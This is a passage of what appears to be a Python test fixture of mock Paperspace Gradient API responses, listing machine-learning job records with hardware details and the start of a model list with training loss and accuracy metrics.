"newImageName": None, "cpuHostname": None, "cpuCount": None, "cpuModel": None, "cpuFlags": None, "cpuMem": None, "gpuName": None, "gpuSerial": None, "gpuDevice": None, "gpuDriver": None, "gpuCount": None, "gpuMem": None, "tpuType": None, "tpuName": None, "tpuGrpcUrl": None, "tpuTFVersion": None, "tpuDatasetDir": None, "tpuModelDir": None, "targetNodeAttrs": None, "jobEnv": None, "sharedMemMBytes": None, "shutdownTimeout": None, "isPreemptible": False, "metricsURL": "aws-testing.paperspace.io", "customMetrics": None, "experimentId": "esk8lny3pxyqd6", "tags": [ "tag1", "tag2", ], }, { "id": "jfl063dsv634h", "name": "job 2", "state": "Stopped", "workspaceUrl": "none", "workingDirectory": "/paperspace", "artifactsDirectory": "/artifacts", "entrypoint": "nvidia-smi", "projectId": "prmr22ve0", "project": "keton", "container": "Test-Container", "containerUrl": "paperspace/tensorflow:1.5.0-gpu", "baseContainer": "Test-Container", "baseContainerUrl": "paperspace/tensorflow:1.5.0-gpu", "machineType": "P100", "cluster": "PS Jobs on GCP", "clusterId": "clkyczmyz", "usageRate": "P100 hourly", "startedByUserId": "ukgvw4i8", "parentJobId": None, "jobError": None, "dtCreated": "2019-03-25T14:54:30.866Z", "dtModified": "2019-03-25T14:54:30.866Z", "dtProvisioningStarted": "2019-03-25T14:59:15.818Z", "dtProvisioningFinished": "2019-03-25T14:59:20.542Z", "dtStarted": "2019-03-25T14:59:20.542Z", "dtFinished": "2019-03-25T14:59:25.631Z", "dtTeardownStarted": "2019-03-25T14:59:25.669Z", "dtTeardownFinished": "2019-03-25T14:59:25.758Z", "dtDeleted": None, "exitCode": 0, "queuePosition": None, "seqNum": 2, "storageRegion": "GCP West", "clusterMachine": "gradient-host-1553525723", "fqdn": "jfl063dsv634h.dgradient.paperspace.com", "ports": None, "isPublic": None, "containerUser": None, "hasCode": None, "codeUploaded": None, "codeCommit": None, "runTillCancelled": None, "pushOnCompletion": None, "newImageName": None, "cpuHostname": "gradient-host-1553525723", "cpuCount": 4, "cpuModel": "Intel(R) Xeon(R) CPU @ 2.30GHz", "cpuFlags": "fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc rep_good nopl xtopology nonstop_tsc cpuid pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm abm invpcid_single pti ssbd ibrs ibpb stibp fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid xsaveopt arat arch_capabilities", "cpuMem": "24683148 kB", "gpuName": "Tesla P100-PCIE-16GB", "gpuSerial": "0324317067114", "gpuDevice": "/dev/nvidia0", "gpuDriver": "410.48", "gpuCount": 1, "gpuMem": "16280 MiB", "tpuType": None, "tpuName": None, "tpuGrpcUrl": None, "tpuTFVersion": None, "tpuDatasetDir": None, "tpuModelDir": None, "targetNodeAttrs": None, "jobEnv": None, "sharedMemMBytes": None, "shutdownTimeout": None, "isPreemptible": False, "metricsURL": "metrics-gcp-dev.paperspace.io", "customMetrics": None, "experimentId": "ejd2v80p7cw6m" }, { "id": "jsvau8w47k78zm", "name": "Clone - jfl063dsv634h", "state": "Stopped", "workspaceUrl": "none", "workingDirectory": "/paperspace", "artifactsDirectory": "/artifacts", "entrypoint": "nvidia-smi", "projectId": "prmr22ve0", "project": "keton", "container": "Test-Container", "containerUrl": "paperspace/tensorflow:1.5.0-gpu", "baseContainer": "Test-Container", "baseContainerUrl": "paperspace/tensorflow:1.5.0-gpu", "machineType": "P100", "cluster": "PS Jobs on GCP", "clusterId": "clkyczmyz", "usageRate": "P100 hourly", "startedByUserId": "ukgvw4i8", "parentJobId": "jfl063dsv634h", "jobError": None, "dtCreated": "2019-03-25T15:04:43.844Z", "dtModified": "2019-03-25T15:04:43.844Z", "dtProvisioningStarted": "2019-03-25T15:07:43.854Z", "dtProvisioningFinished": "2019-03-25T15:07:48.435Z", "dtStarted": "2019-03-25T15:07:48.435Z", "dtFinished": "2019-03-25T15:07:53.523Z", "dtTeardownStarted": "2019-03-25T15:07:53.561Z", "dtTeardownFinished": "2019-03-25T15:07:53.649Z", "dtDeleted": None, "exitCode": 0, "queuePosition": None, "seqNum": 3, "storageRegion": "GCP West", "clusterMachine": "gradient-host-1553526309", "fqdn": "jsvau8w47k78zm.dgradient.paperspace.com", "ports": None, "isPublic": None, "containerUser": None, "hasCode": None, "codeUploaded": None, "codeCommit": None, "runTillCancelled": None, "pushOnCompletion": None, "newImageName": None, "cpuHostname": "gradient-host-1553526309", "cpuCount": 4, "cpuModel": "Intel(R) Xeon(R) CPU @ 2.30GHz", "cpuFlags": "fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc rep_good nopl xtopology nonstop_tsc cpuid pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm abm invpcid_single pti ssbd ibrs ibpb stibp fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid xsaveopt arat arch_capabilities", "cpuMem": "24683148 kB", "gpuName": "Tesla P100-PCIE-16GB", "gpuSerial": "0324317067114", "gpuDevice": "/dev/nvidia0", "gpuDriver": "410.48", "gpuCount": 1, "gpuMem": "16280 MiB", "tpuType": None, "tpuName": None, "tpuGrpcUrl": None, "tpuTFVersion": None, "tpuDatasetDir": None, "tpuModelDir": None, "targetNodeAttrs": None, "jobEnv": None, "sharedMemMBytes": None, "shutdownTimeout": None, "isPreemptible": False, "metricsURL": "metrics-gcp-dev.paperspace.io", "customMetrics": None, "experimentId": None }, { "id": "j2eq99xhvgtum", "name": "keton1-worker-1", "state": "Pending", "workspaceUrl": None, "workingDirectory": "/paperspace", "artifactsDirectory": "/artifacts", "entrypoint": "echo keton", "projectId": "prmr22ve0", "project": "keton", "container": "Test-Container", "containerUrl": "paperspace/tensorflow:1.5.0-gpu", "baseContainer": "Test-Container", "baseContainerUrl": "paperspace/tensorflow:1.5.0-gpu", "machineType": "P100", "cluster": "PS Jobs on GCP", "clusterId": "clkyczmyz", "usageRate": "P100 hourly", "startedByUserId": "ukgvw4i8", "parentJobId": None, "jobError": None, "dtCreated": "2019-03-25T15:07:30.383Z", "dtModified": "2019-03-25T15:07:30.383Z", "dtProvisioningStarted": None, "dtProvisioningFinished": None, "dtStarted": None, "dtFinished": "2019-03-25T15:07:30.383Z", "dtTeardownStarted": None, "dtTeardownFinished": None, "dtDeleted": None, "exitCode": None, "queuePosition": None, "seqNum": 4, "storageRegion": "GCP West", "clusterMachine": None, "fqdn": "j2eq99xhvgtum.dgradient.paperspace.com", "ports": "5000", "isPublic": False, "containerUser": None, "hasCode": None, "codeUploaded": None, "codeCommit": None, "runTillCancelled": None, "pushOnCompletion": None, "newImageName": None, "cpuHostname": None, "cpuCount": None, "cpuModel": None, "cpuFlags": None, "cpuMem": None, "gpuName": None, "gpuSerial": None, "gpuDevice": None, "gpuDriver": None, "gpuCount": None, "gpuMem": None, "tpuType": None, "tpuName": None, "tpuGrpcUrl": None, "tpuTFVersion": None, "tpuDatasetDir": None, "tpuModelDir": None, "targetNodeAttrs": None, "jobEnv": None, "sharedMemMBytes": None, "shutdownTimeout": None, "isPreemptible": False, "metricsURL": "metrics-gcp-dev.paperspace.io", "customMetrics": None, "experimentId": "esibxync23szaq" }, { "id": "jzzinybinuxf9", "name": "keton2-worker-1", "state": "Stopped", "workspaceUrl": "git+https://github.com/Paperspace/multinode-mnist", "workingDirectory": "/paperspace", "artifactsDirectory": "/artifacts", "entrypoint": "echo keton", "projectId": "prmr22ve0", "project": "keton", "container": "Test-Container", "containerUrl": "paperspace/tensorflow:1.5.0-gpu", "baseContainer": "Test-Container", "baseContainerUrl": "paperspace/tensorflow:1.5.0-gpu", "machineType": "P100", "cluster": "PS Jobs on GCP", "clusterId": "clkyczmyz", "usageRate": "P100 hourly", "startedByUserId": "ukgvw4i8", "parentJobId": None, "jobError": None, "dtCreated": "2019-03-25T15:18:51.461Z", "dtModified": "2019-03-25T15:18:51.461Z", "dtProvisioningStarted": "2019-03-25T15:18:58.089Z", "dtProvisioningFinished": "2019-03-25T15:19:03.246Z", "dtStarted": "2019-03-25T15:19:03.246Z", "dtFinished": "2019-03-25T15:19:08.337Z", "dtTeardownStarted": "2019-03-25T15:19:08.374Z", "dtTeardownFinished": "2019-03-25T15:19:08.461Z", "dtDeleted": None, "exitCode": 0, "queuePosition": None, "seqNum": 5, "storageRegion": "GCP West", "clusterMachine": "gradient-host-1553526309", "fqdn": "jzzinybinuxf9.dgradient.paperspace.com", "ports": "5000", "isPublic": False, "containerUser": None, "hasCode": None, "codeUploaded": None, "codeCommit": None, "runTillCancelled": None, "pushOnCompletion": None, "newImageName": None, "cpuHostname": "gradient-host-1553526309", "cpuCount": 4, "cpuModel": "Intel(R) Xeon(R) CPU @ 2.30GHz", "cpuFlags": "fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc rep_good nopl xtopology nonstop_tsc cpuid pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm abm invpcid_single pti ssbd ibrs ibpb stibp fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid xsaveopt arat arch_capabilities", "cpuMem": "24683148 kB", "gpuName": "Tesla P100-PCIE-16GB", "gpuSerial": "0324317067114", "gpuDevice": "/dev/nvidia0", "gpuDriver": "410.48", "gpuCount": 1, "gpuMem": "16280 MiB", "tpuType": None, "tpuName": None, "tpuGrpcUrl": None, "tpuTFVersion": None, "tpuDatasetDir": None, "tpuModelDir": None, "targetNodeAttrs": None, "jobEnv": None, "sharedMemMBytes": None, "shutdownTimeout": None, "isPreemptible": False, "metricsURL": "metrics-gcp-dev.paperspace.io", "customMetrics": None, "experimentId": "ep6hmawh97q0v" }, { "id": "jsb37duc1zlbz0", "name": "keton4-worker-1", "state": "Stopped", "workspaceUrl": "git+https://github.com/Paperspace/multinode-mnist", "workingDirectory": "/paperspace", "artifactsDirectory": "/artifacts", "entrypoint": "echo siema", "projectId": "prmr22ve0", "project": "keton", "container": "Test-Container", "containerUrl": "paperspace/tensorflow:1.5.0-gpu", "baseContainer": "Test-Container", "baseContainerUrl": "paperspace/tensorflow:1.5.0-gpu", "machineType": "P100", "cluster": "PS Jobs on GCP", "clusterId": "clkyczmyz", "usageRate": "P100 hourly", "startedByUserId": "ukgvw4i8", "parentJobId": None, "jobError": None, "dtCreated": "2019-03-25T15:29:04.601Z", "dtModified": "2019-03-25T15:29:04.601Z", "dtProvisioningStarted": "2019-03-25T15:30:42.529Z", "dtProvisioningFinished": "2019-03-25T15:30:48.252Z", "dtStarted": "2019-03-25T15:30:48.252Z", "dtFinished": "2019-03-25T15:30:53.349Z", "dtTeardownStarted": "2019-03-25T15:30:53.387Z", "dtTeardownFinished": "2019-03-25T15:30:53.470Z", "dtDeleted": None, "exitCode": 0, "queuePosition": None, "seqNum": 6, "storageRegion": "GCP West", "clusterMachine": "gradient-host-1553526309", "fqdn": "jsb37duc1zlbz0.dgradient.paperspace.com", "ports": "3456", "isPublic": False, "containerUser": None, "hasCode": None, "codeUploaded": None, "codeCommit": None, "runTillCancelled": None, "pushOnCompletion": None, "newImageName": None, "cpuHostname": "gradient-host-1553526309", "cpuCount": 4, "cpuModel": "Intel(R) Xeon(R) CPU @ 2.30GHz", "cpuFlags": "fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc rep_good nopl xtopology nonstop_tsc cpuid pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm abm invpcid_single pti ssbd ibrs ibpb stibp fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid xsaveopt arat arch_capabilities", "cpuMem": "24683148 kB", "gpuName": "Tesla P100-PCIE-16GB", "gpuSerial": "0324317067114", "gpuDevice": "/dev/nvidia0", "gpuDriver": "410.48", "gpuCount": 1, "gpuMem": "16280 MiB", "tpuType": None, "tpuName": None, "tpuGrpcUrl": None, "tpuTFVersion": None, "tpuDatasetDir": None, "tpuModelDir": None, "targetNodeAttrs": None, "jobEnv": None, "sharedMemMBytes": None, "shutdownTimeout": None, "isPreemptible": False, "metricsURL": "metrics-gcp-dev.paperspace.io", "customMetrics": None, "experimentId": "esgeuvkdokyom2" }, { "id": "jq41vipwy18f7", "name": "keton4-parameter_server-1", "state": "Stopped", "workspaceUrl": "git+https://github.com/Paperspace/multinode-mnist", "workingDirectory": "/paperspace", "artifactsDirectory": "/artifacts", "entrypoint": "ls", "projectId": "prmr22ve0", "project": "keton", "container": "Test-Container", "containerUrl": "paperspace/tensorflow:1.5.0-gpu", "baseContainer": "Test-Container", "baseContainerUrl": "paperspace/tensorflow:1.5.0-gpu", "machineType": "P100", "cluster": "PS Jobs on GCP", "clusterId": "clkyczmyz", "usageRate": "P100 hourly", "startedByUserId": "ukgvw4i8", "parentJobId": None, "jobError": None, "dtCreated": "2019-03-25T15:29:06.765Z", "dtModified": "2019-03-25T15:29:06.765Z", "dtProvisioningStarted": "2019-03-25T15:30:41.416Z", "dtProvisioningFinished": "2019-03-25T15:30:48.004Z", "dtStarted": "2019-03-25T15:30:48.004Z", "dtFinished": "2019-03-25T15:30:53.097Z", "dtTeardownStarted": "2019-03-25T15:30:53.135Z", "dtTeardownFinished": "2019-03-25T15:30:53.223Z", "dtDeleted": None, "exitCode": 0, "queuePosition": None, "seqNum": 7, "storageRegion": "GCP West", "clusterMachine": "gradient-host-1553526384", "fqdn": "jq41vipwy18f7.dgradient.paperspace.com", "ports": "3456", "isPublic": False, "containerUser": None, "hasCode": None, "codeUploaded": None, "codeCommit": None, "runTillCancelled": None, "pushOnCompletion": None, "newImageName": None, "cpuHostname": "gradient-host-1553526384", "cpuCount": 4, "cpuModel": "Intel(R) Xeon(R) CPU @ 2.30GHz", "cpuFlags": "fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc rep_good nopl xtopology nonstop_tsc cpuid pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm abm invpcid_single pti ssbd ibrs ibpb stibp fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid xsaveopt arat arch_capabilities", "cpuMem": "24683148 kB", "gpuName": "Tesla P100-PCIE-16GB", "gpuSerial": "0324317004340", "gpuDevice": "/dev/nvidia0", "gpuDriver": "410.48", "gpuCount": 1, "gpuMem": "16280 MiB", "tpuType": None, "tpuName": None, "tpuGrpcUrl": None, "tpuTFVersion": None, "tpuDatasetDir": None, "tpuModelDir": None, "targetNodeAttrs": None, "jobEnv": None, "sharedMemMBytes": None, "shutdownTimeout": None, "isPreemptible": False, "metricsURL": "metrics-gcp-dev.paperspace.io", "customMetrics": None, "experimentId": "esgeuvkdokyom2" }, { "id": "jsigkjnyb6m3qm", "name": "Test1-worker-1", "state": "Stopped", "workspaceUrl": "git+https://github.com/Paperspace/mnist-sample", "workingDirectory": "/paperspace", "artifactsDirectory": "/artifacts", "entrypoint": "python mnist.py --data_format=channels_last", "projectId": "prmr22ve0", "project": "keton", "container": "tensorflow/tensorflow:1.13.1-py3", "containerUrl": "tensorflow/tensorflow:1.13.1-py3", "baseContainer": "tensorflow/tensorflow:1.13.1-py3", "baseContainerUrl": "tensorflow/tensorflow:1.13.1-py3", "machineType": "K80", "cluster": "PS Jobs on GCP", "clusterId": "clkyczmyz", "usageRate": "K80 hourly", "startedByUserId": "ukgvw4i8", "parentJobId": None, "jobError": None, "dtCreated": "2019-04-02T15:17:05.618Z", "dtModified": "2019-04-02T15:17:05.618Z", "dtProvisioningStarted": "2019-04-02T15:17:11.018Z", "dtProvisioningFinished": "2019-04-02T15:17:56.754Z", "dtStarted": "2019-04-02T15:17:56.754Z", "dtFinished": "2019-04-02T17:02:26.950Z", "dtTeardownStarted": "2019-04-02T17:02:26.987Z", "dtTeardownFinished": "2019-04-02T17:02:54.596Z", "dtDeleted": None, "exitCode": 0, "queuePosition": None, "seqNum": 8, "storageRegion": "GCP West", "clusterMachine": "gradient-host-1553793082-82415ed3", "fqdn": "jsigkjnyb6m3qm.dgradient.paperspace.com", "ports": "5000:5000", "isPublic": False, "containerUser": None, "hasCode": None, "codeUploaded": None, "codeCommit": None, "runTillCancelled": None, "pushOnCompletion": None, "newImageName": None, "cpuHostname": "gradient-host-1553793082-82415ed3", "cpuCount": 2, "cpuModel": "Intel(R) Xeon(R) CPU @ 2.30GHz", "cpuFlags": "fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc rep_good nopl xtopology nonstop_tsc cpuid pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm abm invpcid_single pti ssbd ibrs ibpb stibp fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid xsaveopt arat arch_capabilities", "cpuMem": "12297216 kB", "gpuName": "Tesla K80", "gpuSerial": "0320617087317", "gpuDevice": "/dev/nvidia0", "gpuDriver": "410.48", "gpuCount": 1, "gpuMem": "11441 MiB", "tpuType": None, "tpuName": None, "tpuGrpcUrl": None, "tpuTFVersion": None, "tpuDatasetDir": None, "tpuModelDir": None, "targetNodeAttrs": None, "jobEnv": None, "sharedMemMBytes": None, "shutdownTimeout": None, "isPreemptible": False, "metricsURL": "metrics-gcp-dev.paperspace.io", "customMetrics": None, "experimentId": "ehla1kvbwzaco" }, { "id": "j4g76vuppxqao", "name": "job 1", "state": "Stopped", "workspaceUrl": "s3://ps-projects-development/przhbct98/j4g76vuppxqao/__init__.py.zip", "workingDirectory": "/paperspace", "artifactsDirectory": "/artifacts", "entrypoint": "echo keton", "projectId": "przhbct98", "project": "paperspace-python", "container": "paperspace/tensorflow-python", "containerUrl": "paperspace/tensorflow-python", "baseContainer": "paperspace/tensorflow-python", "baseContainerUrl": "paperspace/tensorflow-python", "machineType": "K80", "cluster": "PS Jobs on GCP", "clusterId": "clkyczmyz", "usageRate": "K80 hourly", "startedByUserId": "ukgvw4i8", "parentJobId": None, "jobError": None, "dtCreated": "2019-04-04T15:12:34.414Z", "dtModified": "2019-04-04T15:12:34.414Z", "dtProvisioningStarted": "2019-04-04T15:12:41.338Z", "dtProvisioningFinished": "2019-04-04T15:12:47.492Z", "dtStarted": "2019-04-04T15:12:47.492Z", "dtFinished": "2019-04-04T15:12:52.582Z", "dtTeardownStarted": "2019-04-04T15:12:52.621Z", "dtTeardownFinished": "2019-04-04T15:12:52.752Z", "dtDeleted": None, "exitCode": 0, "queuePosition": None, "seqNum": 1, "storageRegion": "GCP West", "clusterMachine": "gradient-host-1553793082-82415ed3", "fqdn": "j4g76vuppxqao.dgradient.paperspace.com", "ports": None, "isPublic": None, "containerUser": None, "hasCode": None, "codeUploaded": None, "codeCommit": None, "runTillCancelled": None, "pushOnCompletion": None, "newImageName": None, "cpuHostname": "gradient-host-1553793082-82415ed3", "cpuCount": 2, "cpuModel": "Intel(R) Xeon(R) CPU @ 2.30GHz", "cpuFlags": "fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc rep_good nopl xtopology nonstop_tsc cpuid pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm abm invpcid_single pti ssbd ibrs ibpb stibp fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid xsaveopt arat arch_capabilities", "cpuMem": "12297216 kB", "gpuName": "Tesla K80", "gpuSerial": "0320617087317", "gpuDevice": "/dev/nvidia0", "gpuDriver": "410.48", "gpuCount": 1, "gpuMem": "11441 MiB", "tpuType": None, "tpuName": None, "tpuGrpcUrl": None, "tpuTFVersion": None, "tpuDatasetDir": None, "tpuModelDir": None, "targetNodeAttrs": None, "jobEnv": None, "sharedMemMBytes": None, "shutdownTimeout": None, "isPreemptible": False, "metricsURL": "metrics-gcp-dev.paperspace.io", "customMetrics": None, "experimentId": "esfmkbql393ut0" }, { "id": "jsbnvdhwb46vr9", "name": "job 2", "state": "Failed", "workspaceUrl": "s3://ps-projects-development/przhbct98/jsbnvdhwb46vr9/temp.zip", "workingDirectory": "/paperspace", "artifactsDirectory": "/artifacts", "entrypoint": ". test.sh\npython2 hello.py", "projectId": "przhbct98", "project": "paperspace-python", "container": "paperspace/tensorflow-python", "containerUrl": "paperspace/tensorflow-python", "baseContainer": "paperspace/tensorflow-python", "baseContainerUrl": "paperspace/tensorflow-python", "machineType": "G1", "cluster": "PS Jobs on GCP", "clusterId": "clkyczmyz", "usageRate": "G1 hourly", "startedByUserId": "ukgvw4i8", "parentJobId": None, "jobError": None, "dtCreated": "2019-04-24T09:09:53.645Z", "dtModified": "2019-04-24T09:09:53.645Z", "dtProvisioningStarted": "2019-04-24T09:10:50.771Z", "dtProvisioningFinished": "2019-04-24T09:11:50.968Z", "dtStarted": "2019-04-24T09:11:50.968Z", "dtFinished": "2019-04-24T09:11:56.092Z", "dtTeardownStarted": "2019-04-24T09:11:56.150Z", "dtTeardownFinished": "2019-04-24T09:11:56.346Z", "dtDeleted": None, "exitCode": 2, "queuePosition": None, "seqNum": 2, "storageRegion": "GCP West", "clusterMachine": "gradient-host-1556074006", "fqdn": "jsbnvdhwb46vr9.dgradient.paperspace.com", "ports": None, "isPublic": None, "containerUser": None, "hasCode": None, "codeUploaded": None, "codeCommit": None, "runTillCancelled": None, "pushOnCompletion": None, "newImageName": None, "cpuHostname": "gradient-host-1556074006", "cpuCount": 1, "cpuModel": "Intel(R) Xeon(R) CPU @ 2.30GHz", "cpuFlags": "fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc rep_good nopl xtopology nonstop_tsc cpuid pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm abm invpcid_single pti ssbd ibrs ibpb stibp fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid xsaveopt arat arch_capabilities", "cpuMem": "1783384 kB", "gpuName": None, "gpuSerial": None, "gpuDevice": None, "gpuDriver": None, "gpuCount": None, "gpuMem": None, "tpuType": None, "tpuName": None, "tpuGrpcUrl": None, "tpuTFVersion": None, "tpuDatasetDir": None, "tpuModelDir": None, "targetNodeAttrs": None, "jobEnv": None, "sharedMemMBytes": None, "shutdownTimeout": None, "isPreemptible": False, "metricsURL": "metrics-gcp-dev.paperspace.io", "customMetrics": None, "experimentId": "esmnlol3tavvvf" }, { "id": "jt8alwzv28kha", "name": "job 3", "state": "Failed", "workspaceUrl": "s3://ps-projects-development/przhbct98/jt8alwzv28kha/temp.zip", "workingDirectory": "/paperspace", "artifactsDirectory": "/artifacts", "entrypoint": ". test.sh\npython2 hello.py", "projectId": "przhbct98", "project": "paperspace-python", "container": "paperspace/tensorflow-python", "containerUrl": "paperspace/tensorflow-python", "baseContainer": "paperspace/tensorflow-python", "baseContainerUrl": "paperspace/tensorflow-python", "machineType": "G1", "cluster": "PS Jobs on GCP", "clusterId": "clkyczmyz", "usageRate": "G1 hourly", "startedByUserId": "ukgvw4i8", "parentJobId": None, "jobError": None, "dtCreated": "2019-04-24T10:18:30.620Z", "dtModified": "2019-04-24T10:18:30.620Z", "dtProvisioningStarted": "2019-04-24T10:18:35.057Z", "dtProvisioningFinished": "2019-04-24T10:18:38.241Z", "dtStarted": "2019-04-24T10:18:38.241Z", "dtFinished": "2019-04-24T10:18:43.348Z", "dtTeardownStarted": "2019-04-24T10:18:43.394Z", "dtTeardownFinished": "2019-04-24T10:18:43.544Z", "dtDeleted": None, "exitCode": 2, "queuePosition": None, "seqNum": 3, "storageRegion": "GCP West", "clusterMachine": "gradient-host-1556074006", "fqdn": "jt8alwzv28kha.dgradient.paperspace.com", "ports": None, "isPublic": None, "containerUser": None, "hasCode": None, "codeUploaded": None, "codeCommit": None, "runTillCancelled": None, "pushOnCompletion": None, "newImageName": None, "cpuHostname": "gradient-host-1556074006", "cpuCount": 1, "cpuModel": "Intel(R) Xeon(R) CPU @ 2.30GHz", "cpuFlags": "fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc rep_good nopl xtopology nonstop_tsc cpuid pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm abm invpcid_single pti ssbd ibrs ibpb stibp fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid xsaveopt arat arch_capabilities", "cpuMem": "1783384 kB", "gpuName": None, "gpuSerial": None, "gpuDevice": None, "gpuDriver": None, "gpuCount": None, "gpuMem": None, "tpuType": None, "tpuName": None, "tpuGrpcUrl": None, "tpuTFVersion": None, "tpuDatasetDir": None, "tpuModelDir": None, "targetNodeAttrs": None, "jobEnv": None, "sharedMemMBytes": None, "shutdownTimeout": None, "isPreemptible": False, "metricsURL": "metrics-gcp-dev.paperspace.io", "customMetrics": None, "experimentId": "es47og38wzhnuo" } ] } LIST_MODELS_RESPONSE_JSON = { "modelList": [ { "id": "mosu30xm7q8vb0p", "projectId": "prmr22ve0", "experimentId": "ehla1kvbwzaco", "modelType": "Tensorflow", "name": None, "tag": None, "summary": { "loss": { "result": { "max": 0.028335485607385635, "min": 0.028335485607385635, "var": 0, "mean": 0.028335485607385635, "median": 0.028335485607385635, "stddev": 0 }, "scalar": "loss" }, "accuracy": { "result": { "max": 0.991100013256073, "min": 0.991100013256073, "var": 0, "mean": 0.991100013256073, "median": 0.991100013256073, "stddev": 0 }, "scalar": "accuracy" } }, "detail": [ { "scalars": [ { "data": [ { "operation": "mean", "checkpoints": [ { "value": 0.0621405728161335, "checkpoint": 1175 }, { "value": 0.039062466472387314, "checkpoint": 2323 }, { "value": 0.03250512480735779, "checkpoint": 3471 }, { "value": 0.025037841871380806, "checkpoint": 4606 }, { "value": 0.02336057461798191, "checkpoint": 5785 }, { "value": 0.024296583607792854, "checkpoint": 6956 }, { "value": 0.021974526345729828, "checkpoint": 8116 }, { "value": 0.021116264164447784, "checkpoint": 9262 }, { "value": 0.020851025357842445, "checkpoint": 10397 }, { "value": 0.022611157968640327, "checkpoint": 11566 }, { "value": 0.028335485607385635, "checkpoint": 12000 } ] }, { "operation": "amin", "checkpoints": [ { "value": 0.0621405728161335, "checkpoint": 1175 }, { "value": 0.039062466472387314, "checkpoint": 2323 }, { "value": 0.03250512480735779, "checkpoint": 3471 }, { "value": 0.025037841871380806, "checkpoint": 4606 }, { "value": 0.02336057461798191, "checkpoint": 5785 }, { "value": 0.024296583607792854, "checkpoint": 6956 }, { "value": 0.021974526345729828, "checkpoint": 8116 }, { "value": 0.021116264164447784, "checkpoint": 9262 }, { "value": 0.020851025357842445, "checkpoint": 10397 }, { "value": 0.022611157968640327, "checkpoint": 11566 }, { "value": 0.028335485607385635, "checkpoint": 12000 } ] }, { "operation": "amax", "checkpoints": [ { "value": 0.0621405728161335, "checkpoint": 1175 }, { "value": 0.039062466472387314, "checkpoint": 2323 }, { "value": 0.03250512480735779, "checkpoint": 3471 }, { "value": 0.025037841871380806, "checkpoint": 4606 }, { "value": 0.02336057461798191, "checkpoint": 5785 }, { "value": 0.024296583607792854, "checkpoint": 6956 }, { "value": 0.021974526345729828, "checkpoint": 8116 }, { "value": 0.021116264164447784, "checkpoint": 9262 }, { "value": 0.020851025357842445, "checkpoint": 10397 }, { "value": 0.022611157968640327, "checkpoint": 11566 }, { "value": 0.028335485607385635, "checkpoint": 12000 } ] }, { "operation": "median", "checkpoints": [ { "value": 0.0621405728161335, "checkpoint": 1175 }, { "value": 0.039062466472387314, "checkpoint": 2323 }, { "value": 0.03250512480735779, "checkpoint": 3471 }, { "value": 0.025037841871380806, "checkpoint": 4606 }, { "value": 0.02336057461798191, "checkpoint": 5785 }, { "value": 0.024296583607792854, "checkpoint": 6956 }, { "value": 0.021974526345729828, "checkpoint": 8116 }, { "value": 0.021116264164447784, "checkpoint": 9262 }, { "value": 0.020851025357842445, "checkpoint": 10397 }, { "value": 0.022611157968640327, "checkpoint": 11566 }, { "value": 0.028335485607385635, "checkpoint": 12000 } ] }, { "operation": "std", "checkpoints": [ { "value": 0, "checkpoint": 1175 }, { "value": 0, "checkpoint": 2323 }, { "value": 0, "checkpoint": 3471 }, { "value": 0, "checkpoint": 4606 }, { "value": 0, "checkpoint": 5785 }, { "value": 0, "checkpoint": 6956 }, { "value": 0, "checkpoint": 8116 }, { "value": 0, "checkpoint": 9262 }, { "value": 0, "checkpoint": 10397 }, { "value": 0, "checkpoint": 11566 }, { "value": 0, "checkpoint": 12000 } ] }, { "operation": "var", "checkpoints": [ { "value": 0, "checkpoint": 1175 }, { "value": 0, "checkpoint": 2323 }, { 